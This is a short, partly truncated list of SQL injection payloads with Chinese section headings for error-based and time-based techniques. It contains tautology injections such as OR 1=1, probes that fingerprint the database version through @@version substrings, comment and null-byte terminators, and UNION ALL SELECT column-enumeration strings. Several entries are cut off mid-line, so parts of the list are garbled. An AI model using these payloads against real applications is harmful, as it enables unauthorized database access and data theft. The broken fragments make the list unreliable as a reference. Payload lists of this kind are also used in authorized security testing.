-- - SQL comment
;%00 Nullbyte
` Backtick
基于通用错误的有效负载
OR 1=1
OR 1=0
OR x=x
OR x=y
OR 1=1...3,1))='c'
and (select substring(@@version,3,1))='S'
and (select substring(@@version,3,1))='X'
基于时间的通用...1,2,3,4,5,6,7,8,9,10,11,12,13
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15...ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14#
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15#...',2,3,4,5,6,7,8,9,10,11,12,13,14
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15